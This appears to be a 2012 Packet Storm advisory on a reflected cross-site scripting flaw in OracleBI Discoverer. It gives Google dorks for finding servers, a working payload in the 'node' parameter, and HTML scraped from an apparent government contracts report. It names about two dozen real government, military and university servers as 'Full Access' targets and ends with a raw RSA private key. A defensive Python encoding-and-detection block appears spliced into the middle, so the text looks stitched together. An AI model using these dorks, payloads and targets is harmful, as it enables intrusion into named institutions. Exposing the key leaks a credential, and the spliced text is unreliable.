OracleBI Discoverer 10.1.2.48.18 Cross Site Scripting

2012-12-12T00:00:00
ID PACKETSTORM:118808
Type packetstorm
Reporter Ur0b0r0x
Modified 2012-12-12T00:00:00

Description

-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=  
INDEPENDENT SECURITY RESEARCHER   
PENETRATION TESTING SECURITY  
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=  
  
# Author: Ur0b0r0x  
# Twitter: @Ur0b0r0x  
# Email: ur0b0r0x_@live.com  
# Line: GreyHat  
# Home: ur0b0r0x.blogspot.com  
  
  
# Exploit Title: OracleBI Discoverer Ver 10.1.2.48.18 - Full Access Database - Cross Site Scripting  
# dork1:inurl:discoverer/viewer?  
# dork2:inurl:/discoverer/app/connection  
# dork3:inurl:/discoverer/app/econnection  
# dork4:inurl:/discoverer/app/  
# dork5:inurl:/discoverer/app/explorer"  
# Date: 12/12/2012  
# Author: Ur0b0r0x  
# Url Vendor: http://www.oracle.com/technetwork/developer-tools/discoverer/overview/index.html  
# Vendor Name: Oracle  
# Tested On: Backtrack R3 / Linux Mint  
# Type: php  
  
------------------- Agreement --------------------  
[08/12/2012] - Vulnerability discovered  
[11/12/2012] - Vendor notified, no response received  
[12/12/2012] - Public disclosure   
--------------------------------------------------  
  
#Proof of Concept  
http://ur0b0r0x.blogspot.com/  
  
#Code/Xss/Path  
explorer?node="><img src="x" onerror="alert('XSS')" />   
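The payload above works because the `node` parameter is reflected into an HTML attribute without encoding, so a `">` sequence closes the attribute and the tag and whatever follows is parsed as new markup. The following is an added example, not code from the advisory or from Oracle: it models that reflection with a hypothetical template, shows that attribute encoding (`html.escape` with `quote=True`) neutralises the advisory's payload, and runs a small detector over constructed access-log lines (these are made up for the demonstration) that flags requests whose decoded `node` value contains a tag opener or an `on*=` event handler.

```python
import html
import re
from typing import List, Optional
from urllib.parse import parse_qs, urlsplit

# Request path taken from the advisory's PoC; the host is left out on purpose.
POC_PATH = '/discoverer/app/explorer?node="><img src="x" onerror="alert(\'XSS\')" />'


def render_node_unsafe(node: str) -> str:
    """Hypothetical template that reflects the parameter verbatim into an
    attribute. This is the defect pattern: a '">' in the value ends the
    attribute and the tag, and the rest becomes live markup."""
    return f'<input type="hidden" name="node" value="{node}">'


def render_node_safe(node: str) -> str:
    """Same template with HTML attribute encoding applied (the fix).
    quote=True turns both " and ' into entities, so the value can never
    terminate the attribute it sits in."""
    return f'<input type="hidden" name="node" value="{html.escape(node, quote=True)}">'


def node_param(path: str) -> Optional[str]:
    """Extract the (percent-decoded) node parameter from a request path."""
    qs = parse_qs(urlsplit(path).query, keep_blank_values=True)
    vals = qs.get("node")
    return vals[0] if vals else None


# Detection heuristics for a reflected-XSS probe in this parameter:
# an opening tag, or an inline event handler assignment.
TAG_RE = re.compile(r"<\s*/?\s*[a-z]", re.I)
HANDLER_RE = re.compile(r"\bon[a-z]+\s*=", re.I)


def is_xss_probe(path: str) -> bool:
    """True when the decoded node value looks like markup injection."""
    node = node_param(path)
    if node is None:
        return False
    return bool(TAG_RE.search(node) or HANDLER_RE.search(node))


# Constructed Apache-style access-log lines (not real traffic); the second
# carries the advisory's payload in percent-encoded form, as a browser sends it.
SAMPLE_LOG = [
    '10.0.0.5 - - [12/Dec/2012:10:00:01 +0000] "GET /discoverer/app/explorer?node=ROOT HTTP/1.1" 200 5120',
    '10.0.0.9 - - [12/Dec/2012:10:00:07 +0000] "GET /discoverer/app/explorer?node=%22%3E%3Cimg%20src%3D%22x%22%20onerror%3D%22alert(%27XSS%27)%22%20/%3E HTTP/1.1" 200 5210',
]

REQ_RE = re.compile(r'"(?:GET|POST) (\S+) HTTP/')


def flag_probes(lines: List[str]) -> List[str]:
    """Return the request paths in an access log that match is_xss_probe."""
    hits = []
    for line in lines:
        m = REQ_RE.search(line)
        if m and is_xss_probe(m.group(1)):
            hits.append(m.group(1))
    return hits


if __name__ == "__main__":
    payload = node_param(POC_PATH)
    print("unsafe:", render_node_unsafe(payload))
    print("safe:  ", render_node_safe(payload))
    print("flagged:", flag_probes(SAMPLE_LOG))
```

The unsafe rendering contains two tags (`<input` and the injected `<img`), the safe rendering only one; the encoded value is still readable by the application once it is decoded server-side. The detector decodes before matching, which matters because the payload arrives percent-encoded in logs and would not match a naive search for `<img`.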
  
#Code/Active contracts by Opdiv,office code,completion date - Active Contracts  
<form action="/discoverer/app/parameters" method="POST" style="margin:0px" name="parametersForm" id="parametersForm"><span id="params"><table cellspacing="0" cellpadding="0" border="0" summary=""><tbody><tr><td><span class="x0">Select values for the following parameters.</span></td></tr><tr><td><table cellspacing="0" cellpadding="0" border="0" summary=""><tbody><tr><td><span class="xc">*</span><img width="4" height="1" alt="" src="/discoverer/cabo/images/t.gif"></td><td><span class="x2o">Indicates required field</span></td></tr></tbody></table></td></tr><tr><td><img width="5" height="5" alt="" src="/discoverer/cabo/images/t.gif"></td></tr><tr><td><table width="100%" cellspacing="0" cellpadding="0" border="0" summary=""><tbody><tr><td width="20px"><img width="20" height="1" alt="" src="/discoverer/cabo/images/t.gif"></td><td width="25%" align="right" class="x8"><span class="x8"><span class="xc" title="Required">*</span> <label for="_12">Please select the contract status IN</label></span></td><td width="12"><img width="12" height="0" alt="" src="/discoverer/cabo/images/t.gif"></td><td width="75%" align="left"><table cellspacing="0" cellpadding="0" border="0" summary=""><tbody><tr><td><input type="text" value="'A'" size="30" name="_12" onkeypress="return _submitOnEnter(event, 'parametersForm');" class="x4" id="_12"><img width="8" height="1" alt="" src="/discoverer/cabo/images/t.gif"><a href="#" onclick="var f=document.parametersForm;_submitPartialChange('parametersForm',0,{source:'params',event:'bi_lo_frm_sb',bi_lovID:'_12', partialTargets:'paramsscriptId'});return false;"><img width="24" height="24" border="0" align="absmiddle" alt="Go initiate search" title="Go initiate search" src="/discoverer/cabo/images/cache/clovi.gif"></a></td><td><script language="javascript">function biCallbackparametersForm_12(lovwin){ _setFieldValue(document.parametersForm,"_12",lovwin.top.myDataValue);return false;}</script></td><td><script src="/discoverer/cabo/jsLibs/BIParametersLOV.js" 
language="javascript"></script></td></tr></tbody></table></td></tr><tr><td width="20px"><img width="20" height="1" alt="" src="/discoverer/cabo/images/t.gif"></td><td width="25%" align="right" class="x8"><img width="5" height="5" alt="" src="/discoverer/cabo/images/t.gif"></td><td width="12"><img width="12" height="0" alt="" src="/discoverer/cabo/images/t.gif"></td><td width="75%" align="left"><span class="x2o">Please select the contract status IN</span></td></tr><tr><td width="20px"><img width="20" height="1" alt="" src="/discoverer/cabo/images/t.gif"></td><td width="25%" align="right" class="x8"><img width="5" height="5" alt="" src="/discoverer/cabo/images/t.gif"></td><td width="12"><img width="12" height="0" alt="" src="/discoverer/cabo/images/t.gif"></td><td width="75%" align="left"><img width="5" height="5" alt="" src="/discoverer/cabo/images/t.gif"></td></tr><tr><td width="20px"><img width="20" height="1" alt="" src="/discoverer/cabo/images/t.gif"></td><td width="25%" align="right" class="x8"><span class="x8"><span class="xc" title="Required">*</span> <label for="_14">Please select Office Code IN</label></span></td><td width="12"><img width="12" height="0" alt="" src="/discoverer/cabo/images/t.gif"></td><td width="75%" align="left"><table cellspacing="0" cellpadding="0" border="0" summary=""><tbody><tr><td><input type="text" value="'00102'" size="30" name="_14" class="x4" id="_14"><img width="8" height="1" alt="" src="/discoverer/cabo/images/t.gif"><a href="#" onclick="var f=document.parametersForm;_submitPartialChange('parametersForm',0,{source:'params',event:'bi_lo_frm_sb',bi_lovID:'_14', partialTargets:'paramsscriptId'});return false;"><img width="24" height="24" border="0" align="absmiddle" alt="Go initiate search" title="Go initiate search" src="/discoverer/cabo/images/cache/clovi.gif"></a></td><td><script language="javascript">function biCallbackparametersForm_14(lovwin){ _setFieldValue(document.parametersForm,"_14",lovwin.top.myDataValue);return 
false;}</script></td></tr></tbody></table></td></tr><tr><td width="20px"><img width="20" height="1" alt="" src="/discoverer/cabo/images/t.gif"></td><td width="25%" align="right" class="x8"><img width="5" height="5" alt="" src="/discoverer/cabo/images/t.gif"></td><td width="12"><img width="12" height="0" alt="" src="/discoverer/cabo/images/t.gif"></td><td width="75%" align="left"><span class="x2o">Please select Office Code IN</span></td></tr><tr><td width="20px"><img width="20" height="1" alt="" src="/discoverer/cabo/images/t.gif"></td><td width="25%" align="right" class="x8"><img width="5" height="5" alt="" src="/discoverer/cabo/images/t.gif"></td><td width="12"><img width="12" height="0" alt="" src="/discoverer/cabo/images/t.gif"></td><td width="75%" align="left"><img width="5" height="5" alt="" src="/discoverer/cabo/images/t.gif"></td></tr><tr><td width="20px"><img width="20" height="1" alt="" src="/discoverer/cabo/images/t.gif"></td><td width="25%" align="right" class="x8"><span class="x8"><span class="xc" title="Required">*</span> <label for="_16">Please select Completion Date prior to</label></span></td><td width="12"><img width="12" height="0" alt="" src="/discoverer/cabo/images/t.gif"></td><td width="75%" align="left"><input type="text" value="'01-JUN-2007'" size="30" name="_16" class="x4" id="_16"></td></tr><tr><td width="20px"><img width="20" height="1" alt="" src="/discoverer/cabo/images/t.gif"></td><td width="25%" align="right" class="x8"><img width="5" height="5" alt="" src="/discoverer/cabo/images/t.gif"></td><td width="12"><img width="12" height="0" alt="" src="/discoverer/cabo/images/t.gif"></td><td width="75%" align="left"><span class="x2o">Date Format 'DD-MON-YYYY' (Example: 12-DEC-2012)</span></td></tr><tr><td width="20px"><img width="20" height="1" alt="" src="/discoverer/cabo/images/t.gif"></td><td width="25%" align="right" class="x8"><img width="5" height="5" alt="" src="/discoverer/cabo/images/t.gif"></td><td width="12"><img width="12" 
height="0" alt="" src="/discoverer/cabo/images/t.gif"></td><td width="75%" align="left"><img width="5" height="5" alt="" src="/discoverer/cabo/images/t.gif"></td></tr><tr><td width="20px"><img width="20" height="1" alt="" src="/discoverer/cabo/images/t.gif"></td><td width="25%" align="right" class="x8"><span class="x8"><span class="xc" title="Required">*</span> <label for="_18">Please select component code IN</label></span></td><td width="12"><img width="12" height="0" alt="" src="/discoverer/cabo/images/t.gif"></td><td width="75%" align="left"><table cellspacing="0" cellpadding="0" border="0" summary=""><tbody><tr><td><input type="text" value="'IHS'" size="30" name="_18" class="x4" id="_18"><img width="8" height="1" alt="" src="/discoverer/cabo/images/t.gif"><a href="#" onclick="var f=document.parametersForm;_submitPartialChange('parametersForm',0,{source:'params',event:'bi_lo_frm_sb',bi_lovID:'_18', partialTargets:'paramsscriptId'});return false;"><img width="24" height="24" border="0" align="absmiddle" alt="Go initiate search" title="Go initiate search" src="/discoverer/cabo/images/cache/clovi.gif"></a></td><td><script language="javascript">function biCallbackparametersForm_18(lovwin){ _setFieldValue(document.parametersForm,"_18",lovwin.top.myDataValue);return false;}</script></td></tr></tbody></table></td></tr><tr><td width="20px"><img width="20" height="1" alt="" src="/discoverer/cabo/images/t.gif"></td><td width="25%" align="right" class="x8"><img width="5" height="5" alt="" src="/discoverer/cabo/images/t.gif"></td><td width="12"><img width="12" height="0" alt="" src="/discoverer/cabo/images/t.gif"></td><td width="75%" align="left"><span class="x2o">Please select component code IN</span></td></tr><tr><td width="20px"><img width="20" height="1" alt="" src="/discoverer/cabo/images/t.gif"></td><td width="25%" align="right" class="x8"><img width="5" height="5" alt="" src="/discoverer/cabo/images/t.gif"></td><td width="12"><img width="12" height="0" alt="" 
src="/discoverer/cabo/images/t.gif"></td><td width="75%" align="left"><img width="5" height="5" alt="" src="/discoverer/cabo/images/t.gif"></td></tr></tbody></table></td></tr></tbody></table><script language="javascript">function paramsbi_selectParams() {var f=document.parametersForm;submitForm('parametersForm',1,{event:'bi_selectParams',source:'params',bi_cPath:'params'});}</script><input type="hidden" name="bi_viewNames" value="params"></span><span id="paramsscriptId"></span><a onclick="paramsbi_selectParams();" accesskey="o" href="#"><img width="35" height="18" border="0" align="middle" alt="Go" title="Go" src="/discoverer/cabo/images/cache/en/bGoGl9n.gif"></a><input type="hidden" name="stateStr" value="eNqNU11v2jAU/TMh2mS1ssNH24c8IGDapg0mtX2OHNspAScOtokDv37XCaURtN0eyLUv5577ca4DtzVrGwyiEa8TbsAOoslOmqQZRORhMJzPc8NULbTQD/ntk7JUopnal7YHG13CZqqoVClKC1AuAGmNSYCb4Evks7R5Qa1APkQKm6sSzeE$iGZyDZ9S6YJKOGRUGs$0q5KZKq2mzCJjqd0b9IdqWggrNAF2$E2zLPNm2q$RXGZeaS40Wu4LtHwBHFUOEOcsp6i79wcwdVRzH6R3/aAqWWVZzkTb9btljcFgTHDUL214VdobS0d7nhJ7mxL3d6t6LXuLyc3P5$VNhPFdP8X9ZYq5kpJqg1apzF$AiffAkys591p3Yl5oNMkKwDYFCDQxxsDZ6n1/fuP/1/u8I$R6m056v4r12Wq8Lh77SAKY9vTH98f$dPA/M56h0YfQx3YZAcq5gT/bhP5RwafZ3pBCIvAa6PfoyC12aHtoeI1SenRwYeboorE7NBVDNQDc5tBseH2AYAfSjE4tjiRrHyjQ2vRTYpsemjQ30nrD1sqztqQn56aFAEXlR2TW3cMfudofCMFd7a07YGUQ1szGpuYhK7cxyxIKiIBWgW83g1bBys6YzpSss9y7A9FUMghNFYclyBKTUNSgUQxuWvLQP2MRf7kffg21UjbGoUttHAWVznmw$LX4vVg$wSZF3wgOmD1UQZ0LJ/RfFGiQmw=="><span id="_parametersForm_Postscript"><input type="hidden" name="source"><input type="hidden" name="event"><input type="hidden" name="bi_lovID"><input type="hidden" name="partial"><input type="hidden" name="partialTargets"><input type="hidden" name="bi_cPath"><script>var _resetparametersFormNames=["source","event","bi_lovID","partial","partialTargets","bi_cPath"];</script><script>var _parametersForm_Validations=['_isEmpty(%value%)'];function _parametersFormValidater(form){var fl = 
_multiValidate(form,[0,"_12",0,0,0,"_14",0,0,0,"_16",0,0,0,"_18",0,0]);if(fl.length>0){_validationAlert('Form validation failures:'+fl);return false;}else{return true;}}var _parametersForm_Labels={'_12':'Please select the contract status IN','_14':'Please select Office Code IN','_16':'Please select Completion Date prior to','_18':'Please select component code IN'};var _parametersForm_Formats=['A value must be entered for "%label%".'];function _submitOnEnter(e,frm){return (_getKC(e)!=13);}</script></span><script>_submitFormCheck();</script></form>  
  
  
Sample/Demo/Full_Access/  
http://dcis04.psc.gov/discoverer/app/econnection  
http://abac.upf.edu/discoverer/app/econnection  
http://mytest.sfwmd.gov/discoverer/app/econnection  
http://demoa.ocu.es/discoverer/app/econnection  
http://www.paaf.gov.kw/discoverer/viewer  
http://www.qix.gov.qa/discoverer/app/econnection  
http://discoverer.banrep.gov.co/discoverer/app/econnection  
http://statistik.forsakringskassan.se/discoverer/app/econnection  
https://oasext.epa.gov/discoverer/app/econnection  
http://www.reeis.usda.gov/discoverer/app/connection  
http://cbi.superfinanciera.gov.co/discoverer/app/econnection  
http://owl.cuny.edu:7778/discoverer/app/econnection  
http://oaspruebas.policia.gov.co:7778/discoverer/app/connection?event=displayConnections  
http://siadapp.dmdc.osd.mil/discoverer/viewer  
http://xportalt.sfwmd.gov/discoverer/app/connection  
http://www.cdr.isa.org.jm/discoverer/app/econnection  
http://suamox03.dane.gov.co:7778/discoverer/app/econnection  
http://iaorap1.mincetur.gob.pe:7778/discoverer/viewer  
http://discoverer.dnr.state.la.us/discoverer/app/connection  
http://www.moi.go.th/discoverer/app/econnection  
http://www.reeis.usda.gov/discoverer/app/econnection  
http://www.st.nmfs.noaa.gov/discoverer/app/connection  
http://portal.nysed.gov/discoverer/app/connection  
http://190.242.99.238/discoverer/app/econnection  
  
  
  
-----BEGIN RSA PRIVATE KEY-----  
MIICXQIBAAKBgQD995aYvrD2mK2fwwQr3FoAAprFLfMAiwR8cQUZW2XWDUSNJdvl  
Mq/1qym16+Yx7AVmXbsdCzqV/zeX+VUg6fUUWFwzNru6akjOlEHnSpNPxfJaCOEi  
2AFovRie8LJyXtmXf1VFVU7l33/OBUsGJAUa2H4bR8ChTUffSHqkoFLE5wIDAQAB  
AoGBANJgFc/RpqWfM7Pzx7DNh4AaqDpOJc19Wun6dU7b9y+pLe/+PHlP05Kdhp+8  
GaOg75gsbKNSeeVm1JZ/Y5UwOGJLn06W8PaBgkNG+b6tv9iRV7jSubEscwfGOXSX  
X5Hi9XP02MOrEsqOcgl6Xqpf8//fauhem8a4/iftk2hG3ngBAkEA/4C5QQePSOz/  
WyypDfUC5Nr5h32zq5bvRY++v7ydzeSRQD8uri66zZuz0gGTzjGdyBUb2OuTDT4R  
8RUcW1x9QQJBAP52GYGDg/+EE7ABX4zT/ZOHJScjlezxbwLiTsvWoESRUrQftLOL  
Wvl2IpeYpWvKIjTzyb5WH+IBWPFpM6RfsCcCQQDnqrDOrOsXhYSYB+uVMyYXmhEM  
8EYb/HQhj4+2THCNQoUNSvyphMduLJKkhTeei1B0HeetDRS9uh0Mika29CrBAkAM  
BVg/Hg9mSr8DWY1CAeHAzmma57t1bhJoeHhweLspghP+HmFS+gpaLpKDxtpJtUrY  
ZYvqSfdHnfitruKZqUuRAkAti8p7b53+cFSm14WPNtdhJQnxniUcSKBtNm5ExO7J  
X54eZI4iddc9xnP4rySfwz933FhMRF9Eh3gPUYAPBpp/  
-----END RSA PRIVATE KEY-----  